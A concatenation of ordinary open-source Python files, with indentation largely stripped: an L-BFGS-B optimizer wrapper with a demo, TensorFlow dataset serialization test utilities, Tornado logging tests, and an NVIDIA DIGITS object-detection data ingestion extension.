wa = zeros(2*m*n + 5*n + 11*m*m + 8*m, float64)
iwa = zeros(3*n, int32)
task = zeros(1, 'S60')
csave = zeros(1, 'S60')
lsave = zeros(4, int32)
isave = zeros(44, int32)
dsave = zeros(29, float64)
task[:] = 'START'
n_iterations = 0
while 1:
# x, f, g, wa, iwa, task, csave, lsave, isave, dsave = \
_lbfgsb.setulb(m, x, low_bnd, upper_bnd, nbd, f, g, factr,
pgtol, wa, iwa, task, iprint, csave, lsave,
isave, dsave)
task_str = task.tostring()
if task_str.startswith(b'FG'):
if n_function_evals[0] > maxfun:
task[:] = ('STOP: TOTAL NO. of f AND g EVALUATIONS '
'EXCEEDS LIMIT')
else:
# minimization routine wants f and g at the current x
# Overwrite f and g:
f, g = func_and_grad(x)
elif task_str.startswith(b'NEW_X'):
# new iteration
if n_iterations > maxiter:
task[:] = 'STOP: TOTAL NO. of ITERATIONS EXCEEDS LIMIT'
else:
n_iterations += 1
if callback is not None:
callback(x)
else:
break
task_str = task.tostring().strip(b'\x00').strip()
if task_str.startswith(b'CONV'):
warnflag = 0
elif n_function_evals[0] > maxfun:
warnflag = 1
elif n_iterations > maxiter:
warnflag = 1
else:
warnflag = 2
return OptimizeResult(fun=f, jac=g, nfev=n_function_evals[0],
nit=n_iterations, status=warnflag, message=task_str,
x=x, success=(warnflag == 0))
if __name__ == '__main__':
def func(x):
f = 0.25 * (x[0] - 1) ** 2
for i in range(1, x.shape[0]):
f += (x[i] - x[i-1] ** 2) ** 2
f *= 4
return f
def grad(x):
g = zeros(x.shape, float64)
t1 = x[1] - x[0] ** 2
g[0] = 2 * (x[0] - 1) - 16 * x[0] * t1
for i in range(1, g.shape[0] - 1):
t2 = t1
t1 = x[i + 1] - x[i] ** 2
g[i] = 8 * t2 - 16*x[i] * t1
g[-1] = 8 * t1
return g
def func_and_grad(x):
return func(x), grad(x)
class Problem(object):
def fun(self, x):
return func_and_grad(x)
factr = 1e7
pgtol = 1e-5
n = 25
m = 10
bounds = [(None, None)] * n
for i in range(0, n, 2):
bounds[i] = (1.0, 100)
for i in range(1, n, 2):
bounds[i] = (-100, 100)
x0 = zeros((n,), float64)
x0[:] = 3
x, f, d = fmin_l_bfgs_b(func, x0, fprime=grad, m=m,
factr=factr, pgtol=pgtol)
print(x)
print(f)
print(d)
x, f, d = fmin_l_bfgs_b(func, x0, approx_grad=1,
m=m, factr=factr, pgtol=pgtol)
print(x)
print(f)
print(d)
x, f, d = fmin_l_bfgs_b(func_and_grad, x0, approx_grad=0,
m=m, factr=factr, pgtol=pgtol)
print(x)
print(f)
print(d)
p = Problem()
x, f, d = fmin_l_bfgs_b(p.fun, x0, approx_grad=0,
m=m, factr=factr, pgtol=pgtol)
print(x)
print(f)
print(d)
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base class for testing serializable datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.python.data.experimental.ops import iterator_ops as contrib_iterator_ops
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.util import nest
def remove_variants(get_next_op):
# TODO(b/72408568): Remove this once session.run can get
# variant tensors.
"""Remove variants from a nest structure, so sess.run will execute."""
def _remove_variant(x):
if isinstance(x, ops.Tensor) and x.dtype == dtypes.variant:
return ()
else:
return x
return nest.map_structure(_remove_variant, get_next_op)
class DatasetSerializationTestBase(test.TestCase):
"""Base class for testing serializable datasets."""
def tearDown(self):
self._delete_ckpt()
# TODO(b/72657739): Remove sparse_tensor argument, which is to test the
# (deprecated) saveable `SparseTensorSliceDataset`, once the API
  # `from_sparse_tensor_slices()` and related tests are deleted.
def run_core_tests(self, ds_fn, num_outputs, sparse_tensors=False):
"""Runs the core tests.
Args:
ds_fn: 0-argument function that returns a Dataset.
num_outputs: Total number of outputs expected from this Dataset.
sparse_tensors: Whether dataset is built from SparseTensor(s).
Raises:
AssertionError if any test fails.
"""
# NOTE: We disable all default optimizations in serialization tests in order
# to test the actual dataset in question.
options = dataset_ops.Options()
options.experimental_optimization.apply_default_optimizations = False
def ds_fn_no_opt():
return ds_fn().with_options(options)
self.verify_unused_iterator(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
self.verify_fully_used_iterator(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
self.verify_exhausted_iterator(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
self.verify_multiple_breaks(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
self.verify_reset_restored_iterator(
ds_fn_no_opt, num_outputs, sparse_tensors=sparse_tensors)
def verify_unused_iterator(self,
ds_fn,
num_outputs,
sparse_tensors=False,
verify_exhausted=True):
"""Verifies that saving and restoring an unused iterator works.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
self.verify_run_with_breaks(
ds_fn, [0],
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
def verify_fully_used_iterator(self, ds_fn, num_outputs,
sparse_tensors=False):
"""Verifies that saving and restoring a fully used iterator works.
Note that this only checks saving and restoring an iterator from which
`num_outputs` items have been produced but does not check for an
exhausted iterator, i.e., one from which an OutOfRange error has been
returned.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
sparse_tensors: See `run_core_tests`.
Raises:
AssertionError if test fails.
"""
self.verify_run_with_breaks(
ds_fn, [num_outputs], num_outputs, sparse_tensors=sparse_tensors)
def verify_exhausted_iterator(self, ds_fn, num_outputs, sparse_tensors=False):
"""Verifies that saving and restoring an exhausted iterator works.
An exhausted iterator is one which has returned an OutOfRange error.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
sparse_tensors: See `run_core_tests`.
Raises:
AssertionError if any test fails.
"""
self.gen_outputs(
ds_fn, [],
num_outputs,
verify_exhausted=True,
sparse_tensors=sparse_tensors)
actual = self.gen_outputs(
ds_fn, [],
0,
ckpt_saved=True,
verify_exhausted=True,
sparse_tensors=sparse_tensors)
self.assertEqual(len(actual), 0)
def verify_multiple_breaks(self,
ds_fn,
num_outputs,
num_breaks=10,
sparse_tensors=False,
verify_exhausted=True):
"""Attempts to save/restore at multiple break points.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
num_breaks: The number of break points. These are uniformly spread in
[0, num_outputs] both inclusive.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
self.verify_run_with_breaks(
ds_fn,
self.gen_break_points(num_outputs, num_breaks),
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
def verify_reset_restored_iterator(self,
ds_fn,
num_outputs,
break_point=None,
sparse_tensors=False,
verify_exhausted=True):
"""Attempts to re-initialize a restored iterator.
This is useful when restoring a training checkpoint during validation.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
break_point: Break point. Optional. Defaults to num_outputs/2.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
break_point = num_outputs // 2 if not break_point else break_point
# Collect ground truth containing all outputs.
expected = self.gen_outputs(
ds_fn, [],
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
# Skip some items and save checkpoint.
self.gen_outputs(
ds_fn, [],
break_point,
sparse_tensors=sparse_tensors,
verify_exhausted=False)
actual = []
# Restore from checkpoint and then run init_op.
with ops.Graph().as_default() as g:
saver = self._import_meta_graph()
init_op, get_next_op = self._get_iterator_ops_from_collection(
ds_fn, sparse_tensors=sparse_tensors)
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
self._initialize(init_op, sess)
self._restore(saver, sess)
self._initialize(init_op, sess)
for _ in range(num_outputs):
actual.append(sess.run(get_next_op))
if verify_exhausted:
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next_op)
self.match(expected, actual)
def verify_error_on_save(self,
ds_fn,
num_outputs,
error,
break_point=None,
sparse_tensors=False):
"""Attempts to save a non-saveable iterator.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
error: Declared error when trying to save iterator.
break_point: Break point. Optional. Defaults to num_outputs/2.
sparse_tensors: See `run_core_tests`.
Raises:
AssertionError if any test fails.
"""
break_point = num_outputs // 2 if not break_point else break_point
with ops.Graph().as_default() as g:
init_op, get_next_op, saver = self._build_graph(
ds_fn, sparse_tensors=sparse_tensors)
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
self._initialize(init_op, sess)
for _ in range(break_point):
sess.run(get_next_op)
with self.assertRaises(error):
self._save(sess, saver)
def verify_run_with_breaks(self,
ds_fn,
break_points,
num_outputs,
sparse_tensors=False,
verify_exhausted=True):
"""Verifies that ds_fn() produces the same outputs with and without breaks.
1. Builds a Dataset using `ds_fn` and produces `num_outputs` items from it
*without* stopping at break points.
2. Builds a Dataset using `ds_fn` and produces `num_outputs` items from it
with stopping at break points.
Deep matches outputs from 1 and 2.
Args:
ds_fn: See `gen_outputs`.
break_points: See `gen_outputs`.
num_outputs: See `gen_outputs`.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
expected = self.gen_outputs(
ds_fn, [],
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
actual = self.gen_outputs(
ds_fn,
break_points,
num_outputs,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
self.match(expected, actual)
def gen_outputs(self,
ds_fn,
break_points,
num_outputs,
ckpt_saved=False,
sparse_tensors=False,
verify_exhausted=True,
save_checkpoint_at_end=True):
"""Generates elements from input dataset while stopping at break points.
Produces `num_outputs` outputs and saves the state of the iterator in the
Saver checkpoint.
Args:
ds_fn: 0-argument function that returns the dataset.
break_points: A list of integers. For each `break_point` in
`break_points`, we produce outputs till `break_point` number of items
have been produced and then checkpoint the state. The current graph
and session are destroyed and a new graph and session are used to
produce outputs till next checkpoint or till `num_outputs` elements
have been produced. `break_point` must be <= `num_outputs`.
num_outputs: The total number of outputs to produce from the iterator.
ckpt_saved: Whether a checkpoint already exists.
sparse_tensors: Whether dataset is built from SparseTensor(s).
verify_exhausted: Whether to verify that the iterator has been exhausted
after producing `num_outputs` elements.
save_checkpoint_at_end: Whether to save a checkpoint after producing all
        outputs. If False, checkpoints are saved at each break point but not at the
end. Note that checkpoints overwrite each other so there is always only
a single checkpoint available. Defaults to True.
Returns:
A list of `num_outputs` items.
"""
outputs = []
def get_ops():
if ckpt_saved:
saver = self._import_meta_graph()
init_op, get_next_op = self._get_iterator_ops_from_collection(
ds_fn, sparse_tensors=sparse_tensors)
else:
init_op, get_next_op, saver = self._build_graph(
ds_fn, sparse_tensors=sparse_tensors)
return init_op, get_next_op, saver
for i in range(len(break_points) + 1):
with ops.Graph().as_default() as g:
init_op, get_next_op, saver = get_ops()
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
if ckpt_saved:
self._initialize(init_op, sess)
self._restore(saver, sess)
else:
self._initialize(init_op, sess)
start = break_points[i - 1] if i > 0 else 0
end = break_points[i] if i < len(break_points) else num_outputs
num_iters = end - start
for _ in range(num_iters):
outputs.append(sess.run(get_next_op))
if i == len(break_points) and verify_exhausted:
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next_op)
if save_checkpoint_at_end or i < len(break_points):
self._save(sess, saver)
ckpt_saved = True
return outputs
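  # Illustration (added comment): gen_outputs(ds_fn, [5, 8], 10) produces
  # elements 0-4, checkpoints and rebuilds the graph/session, produces
  # elements 5-7, checkpoints and rebuilds again, then produces elements 8-9
  # (and, with verify_exhausted=True, asserts OutOfRangeError is raised).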
def match(self, expected, actual):
"""Matches nested structures.
Recursively matches shape and values of `expected` and `actual`.
Handles scalars, numpy arrays and other python sequence containers
e.g. list, dict, as well as SparseTensorValue and RaggedTensorValue.
Args:
expected: Nested structure 1.
actual: Nested structure 2.
Raises:
AssertionError if matching fails.
"""
if isinstance(expected, np.ndarray):
expected = expected.tolist()
if isinstance(actual, np.ndarray):
actual = actual.tolist()
self.assertEqual(type(expected), type(actual))
if nest.is_sequence(expected):
self.assertEqual(len(expected), len(actual))
if isinstance(expected, dict):
for key1, key2 in zip(sorted(expected), sorted(actual)):
self.assertEqual(key1, key2)
self.match(expected[key1], actual[key2])
else:
for item1, item2 in zip(expected, actual):
self.match(item1, item2)
elif isinstance(expected, sparse_tensor.SparseTensorValue):
self.match((expected.indices, expected.values, expected.dense_shape),
(actual.indices, actual.values, actual.dense_shape))
elif isinstance(expected, ragged_tensor_value.RaggedTensorValue):
self.match((expected.values, expected.row_splits),
(actual.values, actual.row_splits))
else:
self.assertEqual(expected, actual)
def does_not_match(self, expected, actual):
with self.assertRaises(AssertionError):
self.match(expected, actual)
  def gen_break_points(self, num_outputs, num_samples=10):
    """Generates `num_samples` break points in [0, num_outputs]."""
return np.linspace(0, num_outputs, num_samples, dtype=int)
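  # e.g. gen_break_points(100, num_samples=5) returns array([0, 25, 50, 75, 100])
  # (added comment; points are uniformly spaced with both endpoints included).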
def _build_graph(self, ds_fn, sparse_tensors=False):
iterator = dataset_ops.make_initializable_iterator(ds_fn())
saveable = contrib_iterator_ops.make_saveable_from_iterator(iterator)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)
init_op = iterator.initializer
if sparse_tensors:
get_next = sparse_tensor.SparseTensor(*iterator.get_next())
else:
get_next = iterator.get_next()
self._add_iterator_ops_to_collection(init_op, get_next, ds_fn,
sparse_tensors)
saver = saver_lib.Saver(allow_empty=True)
return init_op, get_next, saver
def _add_iterator_ops_to_collection(self,
init_op,
get_next,
ds_fn,
sparse_tensors=False):
ops.add_to_collection("iterator_ops", init_op)
# `get_next` may be a tuple e.g. in TensorSliceDataset. Since Collections
# do not support tuples we flatten the tensors and restore the shape in
# `_get_iterator_ops_from_collection`.
if sparse_tensors: # specific for deprecated `from_sparse_tensor_slices`.
ops.add_to_collection("iterator_ops", get_next.indices)
ops.add_to_collection("iterator_ops", get_next.values)
ops.add_to_collection("iterator_ops", get_next.dense_shape)
return
get_next_list = nest.flatten(get_next)
for i, output_class in enumerate(
nest.flatten(self._get_output_classes(ds_fn))):
if output_class is sparse_tensor.SparseTensor:
ops.add_to_collection("iterator_ops", get_next_list[i].indices)
ops.add_to_collection("iterator_ops", get_next_list[i].values)
ops.add_to_collection("iterator_ops", get_next_list[i].dense_shape)
else:
ops.add_to_collection("iterator_ops", get_next_list[i])
def _get_iterator_ops_from_collection(self, ds_fn, sparse_tensors=False):
all_ops = ops.get_collection("iterator_ops")
if sparse_tensors: # specific for deprecated `from_sparse_tensor_slices`.
init_op, indices, values, dense_shape = all_ops
return init_op, sparse_tensor.SparseTensor(indices, values, dense_shape)
get_next_list = []
i = 1
for output_class in nest.flatten(self._get_output_classes(ds_fn)):
if output_class is sparse_tensor.SparseTensor:
indices, values, dense_shape = all_ops[i:i + 3]
i += 3
get_next_list.append(
sparse_tensor.SparseTensor(indices, values, dense_shape))
else:
get_next_list.append(all_ops[i])
i += 1
return all_ops[0], nest.pack_sequence_as(
self._get_output_types(ds_fn), get_next_list)
def _get_output_types(self, ds_fn):
with ops.Graph().as_default():
return dataset_ops.get_legacy_output_types(ds_fn())
def _get_output_shapes(self, ds_fn):
with ops.Graph().as_default():
return dataset_ops.get_legacy_output_shapes(ds_fn())
def _get_output_classes(self, ds_fn):
with ops.Graph().as_default():
return dataset_ops.get_legacy_output_classes(ds_fn())
def _ckpt_path(self):
return os.path.join(self.get_temp_dir(), "iterator")
def _latest_ckpt(self):
return checkpoint_management.latest_checkpoint(self.get_temp_dir())
def _save(self, sess, saver):
saver.save(sess, self._ckpt_path())
def _restore(self, saver, sess):
sess.run(lookup_ops.tables_initializer())
saver.restore(sess, self._latest_ckpt())
def _initialize(self, init_op, sess):
sess.run(variables.global_variables_initializer())
sess.run(lookup_ops.tables_initializer())
sess.run(init_op)
def _import_meta_graph(self):
meta_file_path = self._ckpt_path() + ".meta"
return saver_lib.import_meta_graph(meta_file_path)
def _delete_ckpt(self):
# Remove all checkpoint files.
prefix = self._ckpt_path()
pattern = prefix + "*"
files = gfile.Glob(pattern)
    # Remove the files with an explicit loop so this works under both Python 2
    # and Python 3 (map() is lazy in Python 3 and would delete nothing).
    for f in files:
      gfile.Remove(f)
|
|
#!/usr/bin/env python
#
# Copyright 2012 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function
import contextlib
import glob
import logging
import os
import re
import subprocess
import sys
import tempfile
import warnings
from tornado.escape import utf8
from tornado.log import LogFormatter, define_logging_options, enable_pretty_logging
from tornado.options import OptionParser
from tornado.test.util import unittest
from tornado.util import basestring_type
@contextlib.contextmanager
def ignore_bytes_warning():
with warnings.catch_warnings():
warnings.simplefilter('ignore', category=BytesWarning)
yield
class LogFormatterTest(unittest.TestCase):
# Matches the output of a single logging call (which may be multiple lines
# if a traceback was included, so we use the DOTALL option)
LINE_RE = re.compile(b"(?s)\x01\\[E [0-9]{6} [0-9]{2}:[0-9]{2}:[0-9]{2} log_test:[0-9]+\\]\x02 (.*)")
def setUp(self):
self.formatter = LogFormatter(color=False)
# Fake color support. We can't guarantee anything about the $TERM
# variable when the tests are run, so just patch in some values
# for testing. (testing with color off fails to expose some potential
# encoding issues from the control characters)
self.formatter._colors = {
logging.ERROR: u"\u0001",
}
self.formatter._normal = u"\u0002"
# construct a Logger directly to bypass getLogger's caching
self.logger = logging.Logger('LogFormatterTest')
self.logger.propagate = False
self.tempdir = tempfile.mkdtemp()
self.filename = os.path.join(self.tempdir, 'log.out')
self.handler = self.make_handler(self.filename)
self.handler.setFormatter(self.formatter)
self.logger.addHandler(self.handler)
def tearDown(self):
self.handler.close()
os.unlink(self.filename)
os.rmdir(self.tempdir)
def make_handler(self, filename):
# Base case: default setup without explicit encoding.
# In python 2, supports arbitrary byte strings and unicode objects
# that contain only ascii. In python 3, supports ascii-only unicode
# strings (but byte strings will be repr'd automatically).
return logging.FileHandler(filename)
def get_output(self):
with open(self.filename, "rb") as f:
line = f.read().strip()
m = LogFormatterTest.LINE_RE.match(line)
if m:
return m.group(1)
else:
raise Exception("output didn't match regex: %r" % line)
def test_basic_logging(self):
self.logger.error("foo")
self.assertEqual(self.get_output(), b"foo")
def test_bytes_logging(self):
with ignore_bytes_warning():
# This will be "\xe9" on python 2 or "b'\xe9'" on python 3
self.logger.error(b"\xe9")
self.assertEqual(self.get_output(), utf8(repr(b"\xe9")))
def test_utf8_logging(self):
with ignore_bytes_warning():
self.logger.error(u"\u00e9".encode("utf8"))
if issubclass(bytes, basestring_type):
# on python 2, utf8 byte strings (and by extension ascii byte
# strings) are passed through as-is.
self.assertEqual(self.get_output(), utf8(u"\u00e9"))
else:
# on python 3, byte strings always get repr'd even if
# they're ascii-only, so this degenerates into another
# copy of test_bytes_logging.
self.assertEqual(self.get_output(), utf8(repr(utf8(u"\u00e9"))))
def test_bytes_exception_logging(self):
try:
raise Exception(b'\xe9')
except Exception:
self.logger.exception('caught exception')
# This will be "Exception: \xe9" on python 2 or
# "Exception: b'\xe9'" on python 3.
output = self.get_output()
self.assertRegexpMatches(output, br'Exception.*\\xe9')
# The traceback contains newlines, which should not have been escaped.
self.assertNotIn(br'\n', output)
class UnicodeLogFormatterTest(LogFormatterTest):
def make_handler(self, filename):
# Adding an explicit encoding configuration allows non-ascii unicode
# strings in both python 2 and 3, without changing the behavior
# for byte strings.
return logging.FileHandler(filename, encoding="utf8")
def test_unicode_logging(self):
self.logger.error(u"\u00e9")
self.assertEqual(self.get_output(), utf8(u"\u00e9"))
class EnablePrettyLoggingTest(unittest.TestCase):
def setUp(self):
super(EnablePrettyLoggingTest, self).setUp()
self.options = OptionParser()
define_logging_options(self.options)
self.logger = logging.Logger('tornado.test.log_test.EnablePrettyLoggingTest')
self.logger.propagate = False
def test_log_file(self):
tmpdir = tempfile.mkdtemp()
try:
self.options.log_file_prefix = tmpdir + '/test_log'
enable_pretty_logging(options=self.options, logger=self.logger)
self.assertEqual(1, len(self.logger.handlers))
self.logger.error('hello')
self.logger.handlers[0].flush()
filenames = glob.glob(tmpdir + '/test_log*')
self.assertEqual(1, len(filenames))
with open(filenames[0]) as f:
self.assertRegexpMatches(f.read(), r'^\[E [^]]*\] hello$')
finally:
for handler in self.logger.handlers:
handler.flush()
handler.close()
for filename in glob.glob(tmpdir + '/test_log*'):
os.unlink(filename)
os.rmdir(tmpdir)
def test_log_file_with_timed_rotating(self):
tmpdir = tempfile.mkdtemp()
try:
self.options.log_file_prefix = tmpdir + '/test_log'
self.options.log_rotate_mode = 'time'
enable_pretty_logging(options=self.options, logger=self.logger)
self.logger.error('hello')
self.logger.handlers[0].flush()
filenames = glob.glob(tmpdir + '/test_log*')
self.assertEqual(1, len(filenames))
with open(filenames[0]) as f:
self.assertRegexpMatches(
f.read(),
r'^\[E [^]]*\] hello$')
finally:
for handler in self.logger.handlers:
handler.flush()
handler.close()
for filename in glob.glob(tmpdir + '/test_log*'):
os.unlink(filename)
os.rmdir(tmpdir)
def test_wrong_rotate_mode_value(self):
try:
self.options.log_file_prefix = 'some_path'
self.options.log_rotate_mode = 'wrong_mode'
self.assertRaises(ValueError, enable_pretty_logging,
options=self.options, logger=self.logger)
finally:
for handler in self.logger.handlers:
handler.flush()
handler.close()
class LoggingOptionTest(unittest.TestCase):
"""Test the ability to enable and disable Tornado's logging hooks."""
def logs_present(self, statement, args=None):
        # Each test may manipulate and/or parse the options and then log
# a line at the 'info' level. This level is ignored in the
# logging module by default, but Tornado turns it on by default
# so it is the easiest way to tell whether tornado's logging hooks
# ran.
IMPORT = 'from tornado.options import options, parse_command_line'
LOG_INFO = 'import logging; logging.info("hello")'
program = ';'.join([IMPORT, statement, LOG_INFO])
proc = subprocess.Popen(
[sys.executable, '-c', program] + (args or []),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = proc.communicate()
self.assertEqual(proc.returncode, 0, 'process failed: %r' % stdout)
return b'hello' in stdout
def test_default(self):
self.assertFalse(self.logs_present('pass'))
def test_tornado_default(self):
self.assertTrue(self.logs_present('parse_command_line()'))
def test_disable_command_line(self):
self.assertFalse(self.logs_present('parse_command_line()',
['--logging=none']))
def test_disable_command_line_case_insensitive(self):
self.assertFalse(self.logs_present('parse_command_line()',
['--logging=None']))
def test_disable_code_string(self):
self.assertFalse(self.logs_present(
'options.logging = "none"; parse_command_line()'))
def test_disable_code_none(self):
self.assertFalse(self.logs_present(
'options.logging = None; parse_command_line()'))
def test_disable_override(self):
# command line trumps code defaults
self.assertTrue(self.logs_present(
'options.logging = None; parse_command_line()',
['--logging=info']))
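# Stand-alone sketch (illustrative only) of the configuration flow the
# EnablePrettyLoggingTest cases above exercise: register Tornado's logging
# options on a private OptionParser, point them at a file prefix, and let
# enable_pretty_logging attach the matching handler to a logger.
def _demo_enable_pretty_logging(log_dir):
    options = OptionParser()
    define_logging_options(options)
    options.log_file_prefix = os.path.join(log_dir, 'demo_log')
    logger = logging.Logger('tornado.test.log_test.demo')
    enable_pretty_logging(options=options, logger=logger)
    logger.error('hello from the demo')
    for handler in logger.handlers:
        handler.flush()
        handler.close()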
|
|
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
import csv
import operator
import os
import random
import StringIO
import numpy as np
import PIL.Image
import digits
from digits.utils import subclass, override, constants
from ..interface import DataIngestionInterface
from .forms import DatasetForm
from .utils import GroundTruth, GroundTruthObj
from .utils import bbox_to_array, pad_image, resize_bbox_list
TEMPLATE = "template.html"
@subclass
class DataIngestion(DataIngestionInterface):
"""
A data ingestion extension for an object detection dataset
"""
def __init__(self, **kwargs):
super(DataIngestion, self).__init__(**kwargs)
# this instance is automatically populated with form field
# attributes by superclass constructor
if self.custom_classes != '':
s = StringIO.StringIO(self.custom_classes)
reader = csv.reader(s)
self.class_mappings = {}
for idx, name in enumerate(reader.next()):
self.class_mappings[name.strip().lower()] = idx
else:
self.class_mappings = None
# this will be set when we know the phase we are encoding
self.ground_truth = None
@override
def encode_entry(self, entry):
"""
Return numpy.ndarray
"""
image_filename = entry
# (1) image part
# load from file (this returns a PIL image)
img = digits.utils.image.load_image(image_filename)
if self.channel_conversion != 'none':
if img.mode != self.channel_conversion:
# convert to different image mode if necessary
img = img.convert(self.channel_conversion)
# note: the form validator ensured that either none
# or both width/height were specified
if self.padding_image_width:
# pad image
img = pad_image(
img,
self.padding_image_height,
self.padding_image_width)
if self.resize_image_width is not None:
resize_ratio_x = float(self.resize_image_width) / img.size[0]
resize_ratio_y = float(self.resize_image_height) / img.size[1]
# resize and convert to numpy HWC
img = digits.utils.image.resize_image(
img,
self.resize_image_height,
self.resize_image_width)
else:
resize_ratio_x = 1
resize_ratio_y = 1
# convert to numpy array
img = np.array(img)
if img.ndim == 2:
# grayscale
img = img[np.newaxis, :, :]
if img.dtype == 'uint16':
img = img.astype(float)
else:
if img.ndim != 3 or img.shape[2] != 3:
raise ValueError("Unsupported image shape: %s" % repr(img.shape))
# HWC -> CHW
img = img.transpose(2, 0, 1)
# (2) label part
# make sure label exists
label_id = os.path.splitext(os.path.basename(entry))[0]
        if label_id not in self.datasrc_annotation_dict:
raise ValueError("Label key %s not found in label folder" % label_id)
annotations = self.datasrc_annotation_dict[label_id]
# collect bbox list into bboxList
bboxList = []
for bbox in annotations:
# retrieve all vars defining groundtruth, and interpret all
# serialized values as float32s:
np_bbox = np.array(bbox.gt_to_lmdb_format())
bboxList.append(np_bbox)
bboxList = sorted(
bboxList,
key=operator.itemgetter(GroundTruthObj.lmdb_format_length()-1)
)
bboxList.reverse()
# adjust bboxes according to image cropping
bboxList = resize_bbox_list(bboxList, resize_ratio_x, resize_ratio_y)
# return data
feature = img
label = np.asarray(bboxList)
# LMDB compaction: now label (aka bbox) is the joint array
label = bbox_to_array(
label,
0,
max_bboxes=self.max_bboxes,
bbox_width=GroundTruthObj.lmdb_format_length())
return feature, label
@staticmethod
@override
def get_category():
return "Images"
@staticmethod
@override
def get_id():
return "image-object-detection"
@staticmethod
@override
def get_dataset_form():
return DatasetForm()
@staticmethod
@override
def get_dataset_template(form):
"""
parameters:
- form: form returned by get_dataset_form(). This may be populated with values if the job was cloned
return:
- (template, context) tuple
template is a Jinja template to use for rendering dataset creation options
context is a dictionary of context variables to use for rendering the form
"""
extension_dir = os.path.dirname(os.path.abspath(__file__))
template = open(os.path.join(extension_dir, TEMPLATE), "r").read()
context = {'form': form}
return (template, context)
@staticmethod
@override
def get_title():
return "Object Detection"
@override
def itemize_entries(self, stage):
"""
return list of image file names to encode for specified stage
"""
if stage == constants.TEST_DB:
            # don't return anything for the test stage
return []
elif stage == constants.TRAIN_DB:
# load ground truth
self.load_ground_truth(self.train_label_folder)
# get training image file names
return self.make_image_list(self.train_image_folder)
elif stage == constants.VAL_DB:
if self.val_image_folder != '':
# load ground truth
self.load_ground_truth(
self.val_label_folder,
self.val_min_box_size)
# get validation image file names
return self.make_image_list(self.val_image_folder)
else:
# no validation folder was specified
return []
else:
raise ValueError("Unknown stage: %s" % stage)
def load_ground_truth(self, folder, min_box_size=None):
"""
load ground truth from specified folder
"""
datasrc = GroundTruth(
folder,
min_box_size=min_box_size,
class_mappings=self.class_mappings)
datasrc.load_gt_obj()
self.datasrc_annotation_dict = datasrc.objects_all
scene_files = []
for key in self.datasrc_annotation_dict:
scene_files.append(key)
        # determine the maximum number of bounding boxes per image (i.e. the largest label array height):
self.max_bboxes = max([len(annotation) for annotation in self.datasrc_annotation_dict.values()])
def make_image_list(self, folder):
"""
find all supported images within specified folder and return list of file names
"""
image_files = []
for dirpath, dirnames, filenames in os.walk(folder, followlinks=True):
for filename in filenames:
if filename.lower().endswith(digits.utils.image.SUPPORTED_EXTENSIONS):
image_files.append('%s' % os.path.join(folder, filename))
if len(image_files) == 0:
raise ValueError("Unable to find supported images in %s" % folder)
# shuffle
random.shuffle(image_files)
return image_files
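# Illustrative, numpy-only sketch (not part of the extension itself) of the
# image layout handling performed in encode_entry above: grayscale images
# gain a leading channel axis, while 3-channel color images are transposed
# from HWC to CHW.
def _demo_to_chw(img):
    if img.ndim == 2:
        # grayscale -> 1 x H x W
        return img[np.newaxis, :, :]
    if img.ndim == 3 and img.shape[2] == 3:
        # H x W x C -> C x H x W
        return img.transpose(2, 0, 1)
    raise ValueError("Unsupported image shape: %s" % repr(img.shape))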
|
|
"""
